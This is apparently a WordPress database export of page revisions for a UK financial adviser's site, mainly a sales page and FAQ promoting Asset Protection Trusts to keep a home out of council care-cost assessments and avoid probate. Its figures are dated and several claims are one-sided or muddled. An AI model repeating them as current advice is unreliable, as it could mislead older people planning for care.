Protection</a></td>\n<td></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"43\" border=\"0\" /></td>\n</tr>\n<tr>\n<td colspan=\"17\" rowspan=\"2\" valign=\"top\">\n<div id=\"textdiv\">\n\nWith so many different types of <a href=\"/investments\">savings &amp; investments</a> it’s wise to seek advice, we can offer advice on <a href=\"offshore-bonds\">offshore bonds</a>, <a href=\"isas\">ISA\'s</a> and much more...\nsavings &amp; investments &gt;&gt;\n\n</div>\n<div id=\"textdiv2\">\n\nAt Equity SMART we are experts in all areas of Pension Planning, including: <a href=\"/pensions/sipps\">SIPPs</a>, <a href=\"/pensions/pension-release\">Pension Release</a>, and of course <a href=\"/\">Personal Pension Planning</a>.\n\n<a href=\"/pension\">pensions</a> &gt;&gt;\n\n</div>\n&nbsp;\n<div id=\"textdiv2\">Find out more about <a href=\"/asset-protection\">Asset Protection Trusts,</a> <a href=\"/discretionary-trusts\">Discretionary Trusts</a>, <a href=\"/absolute-trust\">Absolute Trusts</a> and <a href=\"/wills-trust\">Wills</a> at Equity SMART.\n\nWe’ll make sure you get the right advice.\ntrusts &amp; protection &gt;&gt;\n\n</div></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"28\" border=\"0\" /></td>\n</tr>\n<tr>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"108\" border=\"0\" /></td>\n</tr>\n<tr>\n<td colspan=\"17\"><img id=\"index_r9_c1\" src=\"/images/index_r9_c1.jpg\" alt=\"\" width=\"950\" height=\"24\" name=\"index_r9_c1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"24\" border=\"0\" /></td>\n</tr>\n<tr>\n<td colspan=\"12\"><a href=\"/\"><img id=\"index_r10_c1\" src=\"/images/index_r10_c1.jpg\" alt=\"What our clients are saying...\" width=\"624\" height=\"41\" name=\"index_r10_c1\" border=\"0\" /></a></td>\n<td rowspan=\"5\"><img id=\"index_r10_c13\" src=\"/images/index_r10_c13.jpg\" alt=\"\" width=\"11\" height=\"335\" name=\"index_r10_c13\" border=\"0\" /></td>\n<td colspan=\"4\"></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"41\" border=\"0\" /></td>\n</tr>\n<tr>\n<td rowspan=\"4\"></td>\n<td rowspan=\"4\"></td>\n<td class=\"headcontent\" style=\"background-image: url(\'additional/images/index_r11_c3.jpg\'); background-repeat: no-repeat;\" colspan=\"2\" rowspan=\"2\" valign=\"top\"><span style=\"color: #600;\">Mr T Upton</span>\n\n2nd February 2017</td>\n<td class=\"headcontent\" style=\"background-image: url(\'additional/images/index_r11_c3.jpg\'); background-repeat: no-repeat;\" colspan=\"5\" rowspan=\"2\" valign=\"top\"><span style=\"color: #600;\">Mr J McCall</span>\n\n9th January 2017</td>\n<td class=\"headcontent\" style=\"background-image: url(\'additional/images/index_r11_c3.jpg\'); background-repeat: no-repeat;\" colspan=\"2\" rowspan=\"2\" valign=\"top\"><span style=\"color: #600;\">Mr K Cairns</span>\n\n1st March 2017</td>\n<td rowspan=\"2\"><img id=\"index_r11_c12\" src=\"/images/index_r11_c12.jpg\" alt=\"\" width=\"9\" height=\"58\" name=\"index_r11_c12\" border=\"0\" /></td>\n<td colspan=\"3\"></td>\n<td rowspan=\"4\"></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"26\" border=\"0\" /></td>\n</tr>\n<tr>\n<td colspan=\"3\" rowspan=\"2\"></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"32\" border=\"0\" /></td>\n</tr>\n<tr>\n<td class=\"reviewcontent\" colspan=\"2\" rowspan=\"2\" valign=\"top\">\"<span lang=\"EN-GB\" xml:lang=\"EN-GB\">My highest recommendation, very polite and trustworthy company.</span>\n\n&nbsp;\n\n<span lang=\"EN-GB\" xml:lang=\"EN-GB\">Many thanks for all your help through a very smooth transaction.</span>\"\n\n&nbsp;</td>\n<td class=\"reviewcontent\" colspan=\"5\" rowspan=\"2\" valign=\"top\">\"The Staff kept me informed of not only the progress of my transfer but also warned me of impending problems which they were successful in overcoming.\n\n&nbsp;\n\nKeeping the jargon simple helped immensely!\"</td>\n<td class=\"reviewcontent\" colspan=\"2\" rowspan=\"2\" valign=\"top\">\"<span lang=\"EN-GB\" xml:lang=\"EN-GB\"><span lang=\"EN-GB\" xml:lang=\"EN-GB\">James Howard was very smart and personable, and went out of his way to be helpful, giving unbiased advice. </span></span>\n\n&nbsp;\n\n<span lang=\"EN-GB\" xml:lang=\"EN-GB\"><span lang=\"EN-GB\" xml:lang=\"EN-GB\">Susan McCall was very helpful and we really appreciated her keeping us up to date with what was happening</span></span>\n\"</td>\n<td rowspan=\"2\"></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"19\" border=\"0\" /></td>\n</tr>\n<tr>\n<td class=\"aboutcontent\" colspan=\"3\" valign=\"top\">Equity SMART are a firm of independent financial advisers based in Manchester city centre, Bolton and London.\n\n&nbsp;\n\nWe\'ve many years of experience providing expert financial advice across a wide range of areas including <a href=\"/trusts-protection\">trusts</a>, <a href=\"/pension\">pensions</a>, <a href=\"/investments\">investments</a>, inheritance tax, savings &amp; taxation. <a href=\"/contact-us\">Contact Us Today</a>.</td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"217\" border=\"0\" /></td>\n</tr>\n<tr>\n<td colspan=\"17\"><img id=\"index_r15_c1\" src=\"/images/index_r15_c1.jpg\" alt=\"\" width=\"950\" height=\"6\" name=\"index_r15_c1\" border=\"0\" /></td>\n<td><img src=\"/images/spacer.gif\" alt=\"\" width=\"1\" height=\"6\" border=\"0\" /></td>\n</tr>\n<tr>\n<td style=\"background-image: url(\'/images/index_r16_c1.jpg\'); background-repeat: no-repeat; color: #333;\" colspan=\"17\" valign=\"top\">\n<div class=\"footerlinks\"><a href=\"/site-map\">sitemap</a> - <a href=\"/privacy-policy\">privacy policy</a> - <a href=\"/\">testimonials</a></div>\n&nbsp;\n<div id=\"footer\" class=\"footer2\" style=\"position: absolute; left: 374px; top: 1300px; width: 280px; height: 21px; z-index: 3; visibility: visible; color: #666; font-size: 11px; text-align: left;\"><a href=\"http://www.seocials.co.uk/\">website design &amp; development</a> by SEOcials.co.uk</div>\n&nbsp;\n<div class=\"footertext\"></div></td>\n<td></td>\n</tr>\n</tbody>\n</table>\n</div>','Wealth Management - Financial Advice and Information','','inherit','closed','closed','','64-autosave-v1','','','2017-09-21 16:55:15','2017-09-21 16:55:15','',64,'http://www.equalitywalk.org.uk/64-autosave-v1',0,'revision','',0),(295,1,'2017-09-21 17:08:24','2017-09-21 17:08:24','And that the Council can take all your assets — including your house — to pay for the care? Only the last £14,500 is protected!\n\nSo just think what you could lose!\n<h4>You have 3 options:-</h4>\n<ol>\n<ol>\n 	<li>You could do nothing and hope for the best. This is not what we would recommend.</li>\n</ol>\n</ol>\n<ol>\n<ol>\n 	<li>You could transfer your assets to your family. By doing this you may protect your assets but you lose control. There are many things that can go wrong with this; your family may have to pay Capital Gains Tax on the asset, they may get divorced or go bankrupt, or simply fall out. Again, we don’t recommend this.</li>\n</ol>\n</ol>\n<ol>\n<ol>\n 	<li>Or you could transfer your assets including your house into an <em>Asset Protection Trust</em>. This allows you to have total control over your assets and helps protects them.</li>\n</ol>\n</ol>\nTo find out more about Asset Protection Trusts and to get the advice you need, please either call us on the telephone number above or complete our quick enquiry form below, and we’ll call you straight back to help you with your investment questions.\n\nWe are ready for your call.\n\nHow are your Assets considered for Long Term Care?\n<ul>\n<ul>\n 	<li>A Doctor, in conjunction with the family, will decide whether you need long term care.</li>\n</ul>\n</ul>\n<ul>\n<ul>\n 	<li>If you need nursing care, the Council must arrange for the care and they must pay for it.</li>\n</ul>\n</ul>\n<ul>\n<ul>\n 	<li>The council has the right to try and recover these costs and they may try to do this. It is more difficult for them to recover costs as the assets are no longer in your name, but in the name of the Trust. The Solicitor Trustees will always deal with the Local Authority and respond to any challenge. The CRAG Report (Charges for Residential Accommodation Guide) states that ‘it would be unreasonable to decide that deliberate deprivation had taken place if the deposit took place when the claimant was fit and healthy and could not have foreseen the need to move into residential accommodation’. Therefore the sooner a Trust is set up the better.</li>\n</ul>\n</ul>\n<ul>\n<ul>\n 	<li>The Council will fund your care up to their maximum funding rate but the Care Homes normally settle for this amount instead of demanding the private rate.</li>\n</ul>\n</ul>\nApart from care costs, the Asset Protection Trust has other big advantages. It will avoid Executory procedure on your death and save money. If most of your assets are in the trust then there will be no Executory Costs and your estate can be paid over to your beneficiaries without delay, usually within a couple of weeks. On death, estates normally cannot be paid out within the first 6 months, and can take up to two years to complete. Assets in a Trust are paid out immediately.\n\nEven if you have a mortgage on your property which you do not want to pay off, then we can, in some cases, still set up a Assets Protection Trust, as long as the lender agrees.\n\n&nbsp;\n\n<strong>Some commonly asked questions:</strong>\n\nWhy is it important? - If the time comes when you do need to go into care, you may find that the assets like your home that’s taken a lifetime to accumulate, can be used for the cost of care rather than going directly to your beneficiaries.\n\nMy family will take of me - Lots of things can change in your lifetime – we are seeing more children become dependent on their parents again due to the economic climate – it may never happen but the current fact speak for themselves that 1 in 4 men and 1 in 3 women unfortunately have to go into care when they are over 65.\n\nWill I get any benefit from it? - Like all things in life it is about making a plan for the eventuality – if the result can save you a significant sum in care costs then it is obviously worth it. Saving on expensive legal probate costs will be of value also.\n\nWhat if I don’t go into care? - Winding up your estate can be costly and time consuming so you will see the benefit by avoiding the in the costs and difficulty involved, in winding up your estate. A solicitor needs appointed when you die to carry out the necessary executory work particularly if the house is in your name and can be expensive. However if you have taken the right steps and you have appointed you home to the Trust then you will find that the Trustees can complete things quickly and efficiently on your behalf.\n\nWhat is the Solicitors role? - Keeping control as a Trustee will be important for you, so if you need to make any key changes or decisions about the Trust your appointed solicitor will always be on your side providing more peace of mind that you can’t be outvoted.\n\nI have heard that you need two Solicitors – is this true? - If you’re Will leaves your estate to more or one beneficiaries then it is important that there are two Solicitors as Trustees, to outvote the remaining family member Trustee. Otherwise he could take control. With two Solicitors this ensures that what you want to happen after your death will actually happen.\n\n&nbsp;\n\nCan I trust the Solicitors? - Solicitors have a duty of care and are bound by the laws of their profession by The Law Society in England and Wales and also The Law Society of Scotland and they cannot benefit from the Trust directly as named beneficiaries.\n\nWhat are the ongoing fees and costs? - There are NO ongoing fees. With this scheme you pay the fee to set up the Trust at the outset and have nothing further to pay unless you go into care and there is a dispute with the Council, which is very rare.\n\nWhat kinds of assets can be placed in the Trust? - You are not means tested by the local authority on any capital up to £14500 and is ignored  – you will tend to look first at other assets like your house, we will advice you on what would be best suited to being allocated to your Trust.\n\nCan other assets be added at a later date? - You can, as assets can be placed in the trust at a later although, this will start the 6 month clock ticking on  that particular asset.\n\nIs there any limit on the value of assets placed with the Trust? - The Asset Protection Trust will usually hold assets up to the value of the current Nil Rate Band (£325,000 for the tax year 2010/11) for each client, as any assets in excess of this would create an immediate charge to lifetime Inheritance Tax of 40%. There are however a number of other options to safeguard your assets if 2 Trusts do not cover your entire estate.\n\nWhen is the best time to set up the Trust? - We would recommend as quickly as possible after you have considered all you options. You will always be under scrutiny from Local Authorities to look back and  review the circumstances in which a Family Protection Trust was set up at any time. You will have less to worry about if it was apparent  you had expectation in entering long term care.\n\nCan I change my mind? - You have control so if anything changes you will have the choice for everything to revert to the way it was in your name only.\n\nCan I move house? - Yes, since you control the Trust you can move house in the usual way except that the deeds are signed by all the Trustees rather than by you alone; but that makes no difference.\n\nWhat happens if one of us dies? - Nothing. The Trust, and the protection that is provides, simply continues as before until the second person dies. The survivor continues to retain control of the Trust.\n\nWhat happens if one of us becomes incapacitated? - Nothing. The remaining Trustees simply continue as before. We also prepare Powers of Attorney as part of this process to allow this to happen. Otherwise without this arrangement, the family may have to go to Court to obtain a Guardianship Order which can be a very difficult and expensive process.\n\n&nbsp;\n<h3>What happens if one of the other Trustees die? - A new Trustee is simply assumed in their place.</h3>\nWho gets my estate when I die? - You will decide you your named beneficiaries are in your Will and letter of wishes. The Trustees will then look to execute your wishes in a timely fashion. Having two Solicitor Trustees ensures this happens quickly and efficiently.\n\n&nbsp;\n\nDo I need a Will then? - Yes, Wills are extremely important. Any estate which is in your name when you die will be dealt with according to the terms of your <a href=\"/wills-trust\" data-bitly-type=\"bitly_hover_card\">Will</a>, assuming the class of beneficiaries names remains the same. We will discuss this with you when setting up the trust.\n\n&nbsp;\n\n<!-- end .entry-content -->\n\n<!-- end .postclass -->\n\n<!--end #comments-->\n<div id=\"respond\"><form id=\"commentform\" action=\"/\" method=\"post\">\n<p class=\"form-submit\"><input id=\"submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /></p>\n&nbsp;\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"f8d04d5f05\" /></p>\n&nbsp;\n\n</form></div>\n<!-- #respond -->\n\n<!-- end #content -->\n<div id=\"sidebar\" class=\"sidebar widget-area\">\n\n&nbsp;\n<div id=\"text-3\" class=\"widget widget_text\">\n<div class=\"widget-wrap\">\n<div class=\"textwidget\">\n\n<!-- AddThis Button BEGIN -->\n<div class=\"addthis_toolbox addthis_default_style addthis_32x32_style\"></div>\n<!-- AddThis Button END -->\n\n</div>\n&nbsp;\n\n</div>\n</div>\n&nbsp;\n<div id=\"text-2\" class=\"widget widget_text\">\n<div class=\"widget-wrap\">\n<div class=\"textwidget\">\n<div id=\"sidebar-contact-form\">\n<div id=\"wpcf7-f447-w1-o1\" class=\"wpcf7\"><form class=\"wpcf7-form\" action=\"../../asset-protection/\" method=\"post\">&nbsp;\n<div style=\"display: none;\"><input name=\"_wpcf7\" type=\"hidden\" value=\"447\" /><input name=\"_wpcf7_version\" type=\"hidden\" value=\"3.2\" /><input name=\"_wpcf7_unit_tag\" type=\"hidden\" value=\"wpcf7-f447-w1-o1\" /><input name=\"_wpnonce\" type=\"hidden\" value=\"fccd9351f5\" /></div>\n&nbsp;\n\nYour Name (required)\n<span class=\"wpcf7-form-control-wrap your-name\"><input class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" name=\"your-name\" size=\"40\" type=\"text\" value=\"\" /></span>\n\n&nbsp;\n\nYour Email (required)\n<span class=\"wpcf7-form-control-wrap your-email\"><input class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" name=\"your-email\" size=\"40\" type=\"text\" value=\"\" /></span>\n\n&nbsp;\n\nYour Message\n<span class=\"wpcf7-form-control-wrap your-message\"><textarea class=\"wpcf7-form-control wpcf7-textarea\" cols=\"40\" name=\"your-message\" rows=\"10\"></textarea></span>\n\n&nbsp;\n<div class=\"side-contact-submit\"><input class=\"wpcf7-form-control wpcf7-submit\" type=\"submit\" value=\"Send Your Message\" /></div>\n&nbsp;\n<div class=\"wpcf7-response-output wpcf7-display-none\"></div>\n</form></div>\n</div>\n</div>\n&nbsp;\n\n</div>\n</div>\n&nbsp;\n<div id=\"text-4\" class=\"widget widget_text\">\n<div class=\"widget-wrap\">\n<div class=\"textwidget\">\n<div class=\"tel\">Or call us on</div>\n</div>\n&nbsp;\n\n</div>\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n<!-- end #content-sidebar-wrap -->\n<div class=\"after_content_sidebar_wrap\">\n<div id=\"text-5\" class=\"widget widget_text\">\n<div class=\"widget-wrap\">\n<div class=\"textwidget\">\n<div class=\"preferred-providers\">A few of our preferred providers</div>\n</div>\n&nbsp;\n\n</div>\n</div>\n&nbsp;\n\n</div>\n<!-- end .after_content_sidebar_wrap -->\n\n<!-- end .wrap -->\n\n<!-- end #inner -->\n<div id=\"footer\" class=\"footer\">\n<div class=\"wrap\">\n<div id=\"footer-nav\">\n\n&nbsp;\n<ul>\n<ul>\n 	<li><a href=\"/\">Wealth Management</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul>\n<ul>\n 	<li><a href=\"/about-us/frequently-asked-questions\">FAQs</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul>\n<ul>\n 	<li><a href=\"/about-us/testimonials\">Testimonials</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul>\n<ul>\n 	<li><a href=\"/privacy-policy\">Privacy Policy</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul>\n<ul>\n 	<li><a href=\"/wealth-management-glossary\">Glossary of Wealth Management Terms</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul>\n<ul>\n 	<li><a href=\"/site-map\">Site map</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul>\n<ul>\n 	<li><a href=\"https://rsr.wrapadviser.co.uk/\">Login</a></li>\n</ul>\n</ul>\n&nbsp;\n\n</div>\n&nbsp;\n\n&nbsp;\n<div class=\"creds\">\n\n© Copyright 2017 Equity SMART\n\n</div>\n</div>\n<!-- end .wrap -->\n\n</div>\n<!-- end #footer -->\n\n<!-- end #wrap -->\n<script type=\"text/javascript\"><![CDATA[jQuery(document).ready(function($) {$(\".myController\").jFlow({controller: \".jFlowControl\",slideWrapper : \"#jFlowSlider\",slides: \"#slides\",selectedWrapper: \"jFlowSelected\",width: \"870px\",height: \"400px\",timer: 6000,duration: 1000,loop: 1,effect: \"right\",prev: \".slider-previous\",next: \".slider-next\",auto: true});});]]></script><script type=\"text/javascript\"><![CDATA[ var addthis_config = {\"data_track_clickback\":false,\"data_track_addressbar\":false,\"data_track_textcopy\":false}; ]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/q-and-a/js/qa.js\"></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/jquery.form.js\"></script><script type=\"text/javascript\"><![CDATA[\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"}; /* ]]]]><![CDATA[> */\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"></script><script type=\"text/javascript\" src=\"/wp-content/themes/genesis/lib/js/menu/superfish.js\"></script><script type=\"text/javascript\" src=\"/wp-content/themes/genesis/lib/js/menu/superfish.args.js\"></script><script type=\"text/javascript\" src=\"/wp-content/plugins/genesis-slider/js/jflow.plus.js\"></script><!--wp_footer-->','Asset Protection','','inherit','closed','closed','','49-autosave-v1','','','2017-09-21 17:08:24','2017-09-21 17:08:24','',49,'http://www.equalitywalk.org.uk/49-autosave-v1',0,'revision','',0),(296,1,'2017-09-21 16:56:19','2017-09-21 16:56:19','And that the Council can take all your assets — including your house — to pay for the care? Only the last £14,500 is protected!\r\n\r\n&nbsp;\r\n\r\nSo just think what you could lose!\r\n<h4>You have 3 options:-</h4>\r\n&nbsp;\r\n<ol>\r\n<ol>\r\n 	<li>You could do nothing and hope for the best. This is not what we would recommend.</li>\r\n</ol>\r\n</ol>\r\n&nbsp;\r\n<ol>\r\n<ol>\r\n 	<li>ou could transfer your assets to your family. By doing this you may protect your assets but you lose control. There are many things that can go wrong with this; your family may have to pay Capital Gains Tax on the asset, they may get divorced or go bankrupt, or simply fall out. Again, we don’t recommend this.</li>\r\n</ol>\r\n</ol>\r\n&nbsp;\r\n<ol>\r\n<ol>\r\n 	<li>Or you could transfer your assets including your house into an <em>Asset Protection Trust</em>. This allows you to have total control over your assets and helps protects them.</li>\r\n</ol>\r\n</ol>\r\n&nbsp;\r\n\r\nTo find out more about Asset Protection Trusts and to get the advice you need, please either call us on the telephone number above or complete our quick enquiry form below, and we’ll call you straight back to help you with your investment questions.\r\n\r\n&nbsp;\r\n\r\nWe are ready for your call.\r\n\r\n&nbsp;\r\n\r\nHow are your Assets considered for Long Term Care?\r\n\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li>A Doctor, in conjunction with the family, will decide whether you need long term care.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li>If you need nursing care, the Council must arrange for the care and they must pay for it.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li>The council has the right to try and recover these costs and they may try to do this. It is more difficult for them to recover costs as the assets are no longer in your name, but in the name of the Trust. The Solicitor Trustees will always deal with the Local Authority and respond to any challenge. The CRAG Report (Charges for Residential Accommodation Guide) states that ‘it would be unreasonable to decide that deliberate deprivation had taken place if the deposit took place when the claimant was fit and healthy and could not have foreseen the need to move into residential accommodation’. Therefore the sooner a Trust is set up the better.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul>\r\n<ul>\r\n 	<li>The Council will fund your care up to their maximum funding rate but the Care Homes normally settle for this amount instead of demanding the private rate.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\nApart from care costs, the Asset Protection Trust has other big advantages. It will avoid Executory procedure on your death and save money. If most of your assets are in the trust then there will be no Executory Costs and your estate can be paid over to your beneficiaries without delay, usually within a couple of weeks. On death, estates normally cannot be paid out within the first 6 months, and can take up to two years to complete. Assets in a Trust are paid out immediately.\r\n\r\n&nbsp;\r\n\r\nEven if you have a mortgage on your property which you do not want to pay off, then we can, in some cases, still set up a Assets Protection Trust, as long as the lender agrees.\r\n\r\n&nbsp;\r\n\r\nSome commonly asked questions:\r\n\r\n&nbsp;\r\n\r\nWhy is it important? - If the time comes when you do need to go into care, you may find that the assets like your home that’s taken a lifetime to accumulate, can be used for the cost of care rather than going directly to your beneficiaries.\r\n\r\n&nbsp;\r\n\r\nMy family will take of me - Lots of things can change in your lifetime – we are seeing more children become dependent on their parents again due to the economic climate – it may never happen but the current fact speak for themselves that 1 in 4 men and 1 in 3 women unfortunately have to go into care when they are over 65.\r\n\r\n&nbsp;\r\n\r\nWill I get any benefit from it? - Like all things in life it is about making a plan for the eventuality – if the result can save you a significant sum in care costs then it is obviously worth it. Saving on expensive legal probate costs will be of value also.\r\n\r\n&nbsp;\r\n\r\nWhat if I don’t go into care? - Winding up your estate can be costly and time consuming so you will see the benefit by avoiding the in the costs and difficulty involved, in winding up your estate. A solicitor needs appointed when you die to carry out the necessary executory work particularly if the house is in your name and can be expensive. However if you have taken the right steps and you have appointed you home to the Trust then you will find that the Trustees can complete things quickly and efficiently on your behalf.\r\n\r\n&nbsp;\r\n\r\nWhat is the Solicitors role? - Keeping control as a Trustee will be important for you, so if you need to make any key changes or decisions about the Trust your appointed solicitor will always be on your side providing more peace of mind that you can’t be outvoted.\r\n\r\n&nbsp;\r\n\r\nI have heard that you need two Solicitors – is this true? - If you’re Will leaves your estate to more or one beneficiaries then it is important that there are two Solicitors as Trustees, to outvote the remaining family member Trustee. Otherwise he could take control. With two Solicitors this ensures that what you want to happen after your death will actually happen.\r\n\r\n&nbsp;\r\n\r\nCan I trust the Solicitors? - Solicitors have a duty of care and are bound by the laws of their profession by The Law Society in England and Wales and also The Law Society of Scotland and they cannot benefit from the Trust directly as named beneficiaries.\r\n\r\n&nbsp;\r\n\r\nWhat are the ongoing fees and costs? - There are NO ongoing fees. With this scheme you pay the fee to set up the Trust at the outset and have nothing further to pay unless you go into care and there is a dispute with the Council, which is very rare.\r\n\r\n&nbsp;\r\n\r\nWhat kinds of assets can be placed in the Trust? - You are not means tested by the local authority on any capital up to £14500 and is ignored  – you will tend to look first at other assets like your house, we will advice you on what would be best suited to being allocated to your Trust.\r\n\r\n&nbsp;\r\n\r\nCan other assets be added at a later date? - You can, as assets can be placed in the trust at a later although, this will start the 6 month clock ticking on  that particular asset.\r\n\r\n&nbsp;\r\n\r\nIs there any limit on the value of assets placed with the Trust? - The Asset Protection Trust will usually hold assets up to the value of the current Nil Rate Band (£325,000 for the tax year 2010/11) for each client, as any assets in excess of this would create an immediate charge to lifetime Inheritance Tax of 40%. There are however a number of other options to safeguard your assets if 2 Trusts do not cover your entire estate.\r\n\r\n&nbsp;\r\n\r\nWhen is the best time to set up the Trust? - We would recommend as quickly as possible after you have considered all you options. You will always be under scrutiny from Local Authorities to look back and  review the circumstances in which a Family Protection Trust was set up at any time. You will have less to worry about if it was apparent  you had expectation in entering long term care.\r\n\r\n&nbsp;\r\n\r\nCan I change my mind? - You have control so if anything changes you will have the choice for everything to revert to the way it was in your name only.\r\n\r\n&nbsp;\r\n\r\nCan I move house? - Yes, since you control the Trust you can move house in the usual way except that the deeds are signed by all the Trustees rather than by you alone; but that makes no difference.\r\n\r\n&nbsp;\r\n\r\nWhat happens if one of us dies? - Nothing. The Trust, and the protection that is provides, simply continues as before until the second person dies. The survivor continues to retain control of the Trust.\r\n\r\n&nbsp;\r\n\r\nWhat happens if one of us becomes incapacitated? - Nothing. The remaining Trustees simply continue as before. We also prepare Powers of Attorney as part of this process to allow this to happen. Otherwise without this arrangement, the family may have to go to Court to obtain a Guardianship Order which can be a very difficult and expensive process.\r\n\r\n&nbsp;\r\n\r\nWhat happens if one of the other Trustees die? - A new Trustee is simply assumed in their place.\r\n\r\n&nbsp;\r\n\r\nWho gets my estate when I die? - You will decide you your named beneficiaries are in your Will and letter of wishes. The Trustees will then look to execute your wishes in a timely fashion. Having two Solicitor Trustees ensures this happens quickly and efficiently.\r\n\r\n&nbsp;\r\n\r\nDo I need a Will then? - Yes, Wills are extremely important. Any estate which is in your name when you die will be dealt with according to the terms of your <a href=\"/wills-trust\" data-bitly-type=\"bitly_hover_card\">Will</a>, assuming the class of beneficiaries names remains the same. We will discuss this with you when setting up the trust.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n<!-- end .entry-content -->\r\n\r\n</div>\r\n<!-- end .postclass -->\r\n<div id=\"comments\"></div>\r\n<!--end #comments-->\r\n<div id=\"respond\">\r\n\r\n&nbsp;\r\n<h3 id=\"reply-title\">Ask a Question or Leave a Comment <small><a id=\"cancel-comment-reply-link\" style=\"display: none;\" href=\"/asset-protection\" rel=\"nofollow\">Cancel reply</a></small></h3>\r\n<form id=\"commentform\" action=\"/\" method=\"post\">&nbsp;\r\n<p class=\"comment-form-author\"><input id=\"author\" tabindex=\"1\" name=\"author\" size=\"30\" type=\"text\" value=\"\" /><label for=\"author\">Name</label> <span class=\"required\">*</span></p>\r\n<!-- #form-section-author .form-section -->\r\n<p class=\"comment-form-email\"><input id=\"email\" tabindex=\"2\" name=\"email\" size=\"30\" type=\"text\" value=\"\" /><label for=\"email\">Email</label> <span class=\"required\">*</span></p>\r\n<!-- #form-section-email .form-section -->\r\n<p class=\"comment-form-url\"><input id=\"url\" tabindex=\"3\" name=\"url\" size=\"30\" type=\"text\" value=\"\" /><label for=\"url\">Website</label></p>\r\n<!-- #form-section-url .form-section -->\r\n<p class=\"comment-form-comment\"><textarea id=\"comment\" tabindex=\"4\" cols=\"45\" name=\"comment\" rows=\"8\"></textarea></p>\r\n<!-- #form-section-comment .form-section -->\r\n<p class=\"form-submit\">\r\n<input id=\"submit\" name=\"submit\" type=\"submit\" value=\"Post Comment\" /><input id=\"comment_post_ID\" name=\"comment_post_ID\" type=\"hidden\" value=\"106\" /></p>\r\n&nbsp;\r\n<p style=\"display: none;\"><input id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" type=\"hidden\" value=\"f8d04d5f05\" /></p>\r\n&nbsp;\r\n\r\n</form></div>\r\n<!-- #respond -->\r\n\r\n</div>\r\n<!-- end #content -->\r\n<div id=\"sidebar\" class=\"sidebar widget-area\">\r\n\r\n&nbsp;\r\n<div id=\"text-3\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div class=\"textwidget\">\r\n\r\n<!-- AddThis Button BEGIN -->\r\n<div class=\"addthis_toolbox addthis_default_style addthis_32x32_style\">\r\n\r\n\r\n\r\n</div>\r\n<!-- AddThis Button END -->\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div id=\"text-2\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div class=\"textwidget\">\r\n<div id=\"sidebar-contact-form\">\r\n<div id=\"wpcf7-f447-w1-o1\" class=\"wpcf7\"><form class=\"wpcf7-form\" action=\"../../asset-protection/\" method=\"post\">&nbsp;\r\n<div style=\"display: none;\">\r\n<input name=\"_wpcf7\" type=\"hidden\" value=\"447\" /><input name=\"_wpcf7_version\" type=\"hidden\" value=\"3.2\" /><input name=\"_wpcf7_unit_tag\" type=\"hidden\" value=\"wpcf7-f447-w1-o1\" /><input name=\"_wpnonce\" type=\"hidden\" value=\"fccd9351f5\" /></div>\r\n&nbsp;\r\n\r\nYour Name (required)\r\n<span class=\"wpcf7-form-control-wrap your-name\"><input class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" name=\"your-name\" size=\"40\" type=\"text\" value=\"\" /></span>\r\n\r\n&nbsp;\r\n\r\nYour Email (required)\r\n<span class=\"wpcf7-form-control-wrap your-email\"><input class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" name=\"your-email\" size=\"40\" type=\"text\" value=\"\" /></span>\r\n\r\n&nbsp;\r\n\r\nYour Message\r\n<span class=\"wpcf7-form-control-wrap your-message\"><textarea class=\"wpcf7-form-control wpcf7-textarea\" cols=\"40\" name=\"your-message\" rows=\"10\"></textarea></span>\r\n\r\n&nbsp;\r\n<div class=\"side-contact-submit\"><input class=\"wpcf7-form-control wpcf7-submit\" type=\"submit\" value=\"Send Your Message\" /></div>\r\n&nbsp;\r\n<div class=\"wpcf7-response-output wpcf7-display-none\"></div>\r\n</form></div>\r\n</div>\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div id=\"text-4\" class=\"widget widget_text\">\r\n<div class=\"widget-wrap\">\r\n<div 